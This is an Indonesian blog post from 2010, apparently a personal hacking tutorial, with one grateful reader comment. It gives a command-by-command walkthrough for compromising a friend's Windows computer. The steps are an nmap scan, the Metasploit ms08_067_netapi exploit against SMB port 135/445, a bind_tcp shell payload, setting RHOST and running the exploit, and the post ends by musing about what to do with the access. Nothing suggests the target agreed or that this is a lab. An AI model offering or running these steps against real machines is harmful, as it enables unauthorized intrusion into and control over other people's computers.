Jumat, 20 Agustus 2010

metasploit versi 2

Standard
saya mau melakuakn inject terhadap komp teman saya melalui vncinject yang ada pada exploit... pertama yang hrus kita lakukan mengecek port apa saja yang terbuka dengan melakukan nmap -sS -O [ip target] setelah muncul saya akan masuk melalu port 135/tcp kemudian saya masuk ke metasploit dengan mengetikan msfconsole setelah itu saya mulai beraksi dengan mengetikan use exploit/windows/smb/ms08_067_netapi lalu kita liat ada perintah apa saja dengan mengetikan show payloads kemudian kita set payload sesuai dengan apa yang anda inginkan klo saya inginnya menggukan set payload windows/shell/bind_tcp setelah itu kita liat perintah apa saja yang belum ada/belum kita seting... setelah keluar kita masukan RHOST ( ip si target ) dengan perintah set RHOST 192.168.16 (terserah) oce sudah selesai mari kita test... dengan mengetikan exploit tada... kita berhasil masuk deh... enaknya kita apain yah???!!! ref : http://www.hacker-cisadane.org nobita_chupuy Hacker Cisadane

1 komentar:

Anonim mengatakan...

owh gt toch cara kerjanya.,.
tanks bgt gan.,.,